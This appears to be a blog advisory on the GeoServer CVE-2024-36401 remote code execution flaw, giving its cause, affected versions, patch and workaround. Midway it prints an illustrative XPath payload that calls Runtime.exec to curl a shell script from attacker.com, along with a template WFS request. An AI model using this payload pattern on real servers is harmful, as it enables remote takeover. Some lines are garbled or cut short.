GeoServer is a popular open-source server used for sharing and editing geospatial data. Many organizations rely on it for serving maps and spatial data to the web, apps, and internal systems. However, a severe security vulnerability labeled CVE-2024-36401 was discovered that puts all GeoServer instances at risk of Remote Code Execution (RCE) — even without authentication.
In this exclusive post, we’ll break down what the vulnerability is, how it works, its dangerous impact, how you can protect yourself, and why you must patch your GeoServer right now.
What Is CVE-2024-36401?
CVE-2024-36401 is a vulnerability affecting GeoServer prior to versions 2.23.6, 2.24.4, and 2.25.2. Through insecure handling of OGC request parameters—such as those in WFS and WMS requests—an attacker can send specially crafted input resulting in arbitrary code execution on the server.
The root cause is how GeoServer (using GeoTools) evaluates property names as XPath expressions:
- GeoServer passes attribute/property names to the commons-jxpath library, even for simple features.
This allows attackers to inject XPath with payloads that reach code execution.
- The jxpath evaluator is only supposed to help process complex feature types but is mistakenly exposed to all request processing.
Impact:
The problem appears in code similar to the following (simplified for explanation)
// Vulnerable pseudocode - simplified for illustration
String propertyName = request.getParameter("propertyName");
Object value = JXPathContext.newContext(feature).getValue(propertyName);
Attackers may supply a malicious propertyName that, when evaluated as an XPath expression by jxpath, triggers execution of Java methods or expressions.
For example (not a working exploit but to illustrate)
propertyName=java.lang.Runtime.getRuntime().exec('curl attacker.com/shell.sh')
If this gets evaluated, it could result in fetching and running a malicious script on your server.
Craft a malicious OGC request: For example, a WFS request such as
GET /geoserver/ows?service=WFS&version=1..&request=GetFeature&typeName=topp:states&propertyName=[malicious-xpath-here] HTTP/1.1
Host: target-geoserver.com
3. Request reaches server: GeoServer unintentionally evaluates the payload in a way that allows arbitrary code execution.
No Public PoC (Yet)
No working public exploit code has been released (likely due to responsible disclosure and the criticality), but researchers have confirmed this bug is practical and exploitable through the above listed endpoints.
Fixes and Workarounds
PATCH NOW
2.25.2
Patch download and release notes:
- GeoServer Download
- GeoServer Security Announcement (original reference)
- CVE Record
Workaround:
If you can't patch right away, remove the vulnerable JAR from your installation
- Find the file: WEB-INF/lib/gt-complex-x.y.jar
Should You Worry? (Yes)
All GeoServer installations (including default, out-of-box setups) are vulnerable. Attackers need no authentication. Exploitation could lead to:
[ ] Is your GeoServer internet-accessible, or accessible to untrusted users?
- [ ] Do you process WFS/WMS/WPS requests?
If yes to any, PATCH IMMEDIATELY or use the workaround!
Like to Dig Deeper?
- GeoServer GitHub Advisory
- National Vulnerability Database Entry
- GeoServer Official Announcement
Final Thoughts
Don’t wait to apply this patch. If you run GeoServer — in production, testing, or even demos — you must update or mitigate immediately. The threat is very real, and exploitation is trivial once a working payload is known. There are no secret firewalls or configs to save you; only updating can close this hole.
Stay safe, and patch your GeoServer!
If you have any questions or need help upgrading, the GeoServer User List and Community are great resources.
Timeline
Published on: 07/01/2024 16:15:04 UTC
Last modified on: 07/18/2024 21:28:49 UTC